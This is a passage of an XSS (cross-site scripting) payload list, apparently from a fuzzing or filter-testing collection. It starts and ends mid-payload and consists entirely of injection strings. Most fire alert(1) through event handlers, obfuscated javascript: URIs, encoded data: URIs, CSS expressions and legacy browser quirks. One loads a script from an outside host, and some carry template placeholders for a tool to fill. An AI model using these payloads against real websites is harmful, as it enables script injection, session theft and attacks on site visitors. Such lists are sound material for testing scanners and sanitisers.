confirm(1);</script </svg> <svg><script onlypossibleinopera:-)> alert(1) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe <script x> alert(1) </script 1=2 <div/onmouseover='alert(1)'> style="x:"> <--`<img/src=` onerror=alert(1)> --!> <script/src=data:text/javascript,alert(1)></script> <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> "><img src=x onerror=window.open('https://www.google.com/');> <form><button formaction=javascript:alert(1)>CLICKME <math><a xlink:href="//jsfiddle.net/t846h/">click <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> <img src=1 href=1 onerror="javascript:alert(1)"></img> <audio src=1 href=1 onerror="javascript:alert(1)"></audio> <video src=1 href=1 onerror="javascript:alert(1)"></video> <body src=1 href=1 onerror="javascript:alert(1)"></body> <image src=1 href=1 onerror="javascript:alert(1)"></image> <object src=1 href=1 onerror="javascript:alert(1)"></object> <script src=1 href=1 onerror="javascript:alert(1)"></script> <svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> <title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> <iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> <body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> <body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> <frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> <script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> <html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> <body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> <svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> <body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> <body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> <body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> <body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> <bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> <html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> <html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> <style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> <iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> <body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> <style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> <frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> <applet onError applet onError="javascript:javascript:alert(1)"></applet onError> <marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> <script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> <html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> <html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> <body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> <html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> <marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> <xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> <frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> <applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> <svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> <html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> <body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> <body onResize body onResize="javascript:javascript:alert(1)"></body onResize> <object onError object onError="javascript:javascript:alert(1)"></object onError> <body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> <html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> <applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> <body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> <svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> <applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> <body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> <body onunload body onunload="javascript:javascript:alert(1)"></body onunload> <iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> <body onload body onload="javascript:javascript:alert(1)"></body onload> <html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> <object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> <body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> <body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> <body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> <iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> <iframe src iframe src="javascript:javascript:alert(1)"></iframe src> <svg onload svg onload="javascript:javascript:alert(1)"></svg onload> <html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> <body onblur body onblur="javascript:javascript:alert(1)"></body onblur> \x3Cscript>javascript:alert(1)</script> '"`><script>/* *\x2Fjavascript:alert(1)// */</script> <script>javascript:alert(1)</script\x0D <script>javascript:alert(1)</script\x0A <script>javascript:alert(1)</script\x0B <script charset="\x22>javascript:alert(1)</script> <!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> --><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> --><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> `"'><img src='#\x27 onerror=javascript:alert(1)> <a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> "'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> <a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> <script>/* *\x2A/javascript:alert(1)// */</script> <script>/* *\x00/javascript:alert(1)// */</script> <style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> <style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> "'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF "'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF <script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> <script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> <script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> '`"><\x3Cscript>javascript:alert(1)</script> '`"><\x00script>javascript:alert(1)</script> "'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> "'`><\x00img src=xxx:x onerror=javascript:alert(1)> <script src="data:text/plain\x2Cjavascript:alert(1)"></script> <script src="data:\xD4\x8F,javascript:alert(1)"></script> <script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> <script src="data:\xCB\x8F,javascript:alert(1)"></script> <script\x20type="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(1);</script> ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF ABC<div style="x:expression\x5C(javascript:alert(1)">DEF ABC<div style="x:expression\x00(javascript:alert(1)">DEF ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x09expression(javascript:alert(1)">DEF ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF ABC<div style="x:\x20expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF ABC<div style="x:\x00expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF <a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> `"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> `"'><img src=xxx:x \x22onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> `"'><img src=xxx:x \x0Donerror=javascript:alert(1)> `"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> `"'><img src=xxx:x \x09onerror=javascript:alert(1)> `"'><img src=xxx:x \x0Conerror=javascript:alert(1)> `"'><img src=xxx:x \x00onerror=javascript:alert(1)> `"'><img src=xxx:x \x27onerror=javascript:alert(1)> `"'><img src=xxx:x \x20onerror=javascript:alert(1)> "`'><script>\x3Bjavascript:alert(1)</script> "`'><script>\x0Djavascript:alert(1)</script> "`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "`'><script>\xE2\x80\x81javascript:alert(1)</script> "`'><script>\xE2\x80\x84javascript:alert(1)</script> "`'><script>\xE3\x80\x80javascript:alert(1)</script> "`'><script>\x09javascript:alert(1)</script> "`'><script>\xE2\x80\x89javascript:alert(1)</script> "`'><script>\xE2\x80\x85javascript:alert(1)</script> "`'><script>\xE2\x80\x88javascript:alert(1)</script> "`'><script>\x00javascript:alert(1)</script> "`'><script>\xE2\x80\xA8javascript:alert(1)</script> "`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "`'><script>\xE1\x9A\x80javascript:alert(1)</script> "`'><script>\x0Cjavascript:alert(1)</script> "`'><script>\x2Bjavascript:alert(1)</script> "`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "`'><script>-javascript:alert(1)</script> "`'><script>\x0Ajavascript:alert(1)</script> "`'><script>\xE2\x80\xAFjavascript:alert(1)</script> "`'><script>\x7Ejavascript:alert(1)</script> "`'><script>\xE2\x80\x87javascript:alert(1)</script> "`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "`'><script>\xE2\x80\xA9javascript:alert(1)</script> "`'><script>\xC2\x85javascript:alert(1)</script> "`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> "`'><script>\xE2\x80\x83javascript:alert(1)</script> "`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> "`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> "`'><script>\xE2\x80\x80javascript:alert(1)</script> "`'><script>\x21javascript:alert(1)</script> "`'><script>\xE2\x80\x82javascript:alert(1)</script> "`'><script>\xE2\x80\x86javascript:alert(1)</script> "`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> "`'><script>\x0Bjavascript:alert(1)</script> "`'><script>\x20javascript:alert(1)</script> "`'><script>\xC2\xA0javascript:alert(1)</script> "/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x /> <script\x2F>javascript:alert(1)</script> <script\x20>javascript:alert(1)</script> <script\x0D>javascript:alert(1)</script> <script\x0A>javascript:alert(1)</script> <script\x0C>javascript:alert(1)</script> <script\x00>javascript:alert(1)</script> <script\x09>javascript:alert(1)</script> "><img src=x onerror=javascript:alert(1)> "><img src=x onerror=javascript:alert('1')> "><img src=x onerror=javascript:alert("1")> "><img src=x onerror=javascript:alert(`1`)> "><img src=x onerror=javascript:alert(('1'))> "><img src=x onerror=javascript:alert(("1"))> "><img src=x onerror=javascript:alert((`1`))> "><img src=x onerror=javascript:alert(A)> "><img src=x onerror=javascript:alert((A))> "><img src=x onerror=javascript:alert(('A'))> "><img src=x onerror=javascript:alert('A')> "><img src=x onerror=javascript:alert(("A"))> "><img src=x onerror=javascript:alert("A")> "><img src=x onerror=javascript:alert((`A`))> "><img src=x onerror=javascript:alert(`A`)> `"'><img src=xxx:x onerror\x0B=javascript:alert(1)> `"'><img src=xxx:x onerror\x00=javascript:alert(1)> `"'><img src=xxx:x onerror\x0C=javascript:alert(1)> `"'><img src=xxx:x onerror\x0D=javascript:alert(1)> `"'><img src=xxx:x onerror\x20=javascript:alert(1)> `"'><img src=xxx:x onerror\x0A=javascript:alert(1)> `"'><img src=xxx:x onerror\x09=javascript:alert(1)> <script>javascript:alert(1)<\x00/script> <img src=# onerror\x3D"javascript:alert(1)" > <input onfocus=javascript:alert(1) autofocus> <input onblur=javascript:alert(1) autofocus><input autofocus> <video poster=javascript:javascript:alert(1)// <body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X <video><source onerror="javascript:javascript:alert(1)"> <video onerror="javascript:javascript:alert(1)"><source> <form><button formaction="javascript:javascript:alert(1)">X <body oninput=javascript:alert(1)><input autofocus> <math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math> <frameset onload=javascript:alert(1)> <table background="javascript:javascript:alert(1)"> <!--<img src="--><img src=x onerror=javascript:alert(1)//"> <comment><img src="</comment><img src=x onerror=javascript:alert(1))//"> <![><img src="]><img src=x onerror=javascript:alert(1)//"> <style><img src="</style><img src=x onerror=javascript:alert(1)//"> <li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div> <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT> <object data="data:text/html;base64,%(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b <script>alert(1)</script>0 <div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> <x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'> <embed src="javascript:alert(1)"> <img src="javascript:alert(1)"> <image src="javascript:alert(1)"> <script src="javascript:alert(1)"> <div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x <? foo="><script>javascript:alert(1)</script>"> <! foo="><script>javascript:alert(1)</script>"> </ foo="><script>javascript:alert(1)</script>"> <? foo="><x foo='?><script>javascript:alert(1)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>"> <% foo><x foo="%><script>javascript:alert(1)</script>"> <div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script> <img \x00src=x onerror="alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x11src=x onerror="javascript:alert(1)"> <img \x12src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(1)"> <img \x34src=x onerror="javascript:alert(1)"> <img \x39src=x onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(1)"> <img src\x09=x onerror="javascript:alert(1)"> <img src\x10=x onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(1)"> <img src\x32=x onerror="javascript:alert(1)"> <img src\x12=x onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(1)"> <img src\x00=x onerror="javascript:alert(1)"> <img src\x47=x onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(1)"> <img src=x\x10onerror="javascript:alert(1)"> <img src=x\x11onerror="javascript:alert(1)"> <img src=x\x12onerror="javascript:alert(1)"> <img src=x\x13onerror="javascript:alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <img src=x onerror=\x09"javascript:alert(1)"> <img src=x onerror=\x10"javascript:alert(1)"> <img src=x onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(1)"> <img src=x onerror=\x32"javascript:alert(1)"> <img src=x onerror=\x00"javascript:alert(1)"> <a href=javascript:javascript:alert(1)>XXX</a> <img src="x` `<script>javascript:alert(1)</script>"` `> <img src onerror /" '"= alt=javascript:alert(1)//"> <title onpropertychange=javascript:alert(1)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <!--[if]><script>javascript:alert(1)</script --> <!--[if<img src=x onerror=javascript:alert(1)//]> --> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d <style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a> <style>*[{}@import'%(css)s?]</style>X <div style="font-family:'foo;color:red;';">XXX <div style="font-family:foo}color=red;">XXX <// style=x:expression\28javascript:alert(1)\29> <style>*{x:expression(javascript:alert(1))}</style> <div style=content:url(%(svg)s)></div> <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> <div style="background:url(/f#oo/;color:red/*/foo.jpg);">X <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style> <x style="background:url('x;color:red;/*')">XXX</x> <script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script> <script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script> <script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script> <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script> <meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi <meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&> <meta charset="mac-farsi">ºscriptæjavascript:alert(1)º/scriptæ X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` > 1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`> 1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>> <vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> 1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> <a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> <x style="behavior:url(%(sct)s)"> <xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> <event-source src="%(event)s" onload="javascript:alert(1)"> <a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> <div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>"> <script>%(payload)s</script> <script src=%(jscript)s></script> <script language='javascript' src='%(jscript)s'></script> <script>javascript:alert(1)</script> <IMG SRC="javascript:javascript:alert(1);"> <IMG SRC=javascript:javascript:alert(1)> <IMG SRC=`javascript:javascript:alert(1)`> <SCRIPT SRC=%(jscript)s?<B> <FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> <BODY ONLOAD=javascript:alert(1)> <BODY ONLOAD=javascript:javascript:alert(1)> <IMG SRC="jav ascript:javascript:alert(1);"> <BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> <SCRIPT/SRC="%(jscript)s"></SCRIPT> <<SCRIPT>%(payload)s//<</SCRIPT> <IMG SRC="javascript:javascript:alert(1)" <iframe src=%(scriptlet)s < <INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> <IMG DYNSRC="javascript:javascript:alert(1)"> <IMG LOWSRC="javascript:javascript:alert(1)"> <BGSOUND SRC="javascript:javascript:alert(1);"> <BR SIZE="&{javascript:alert(1)}"> <LAYER SRC="%(scriptlet)s"></LAYER> <LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> <STYLE>@import'%(css)s';</STYLE> <META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> <XSS STYLE="behavior: url(%(htc)s);"> <STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS <META HTTP-EQUIV="refresh" 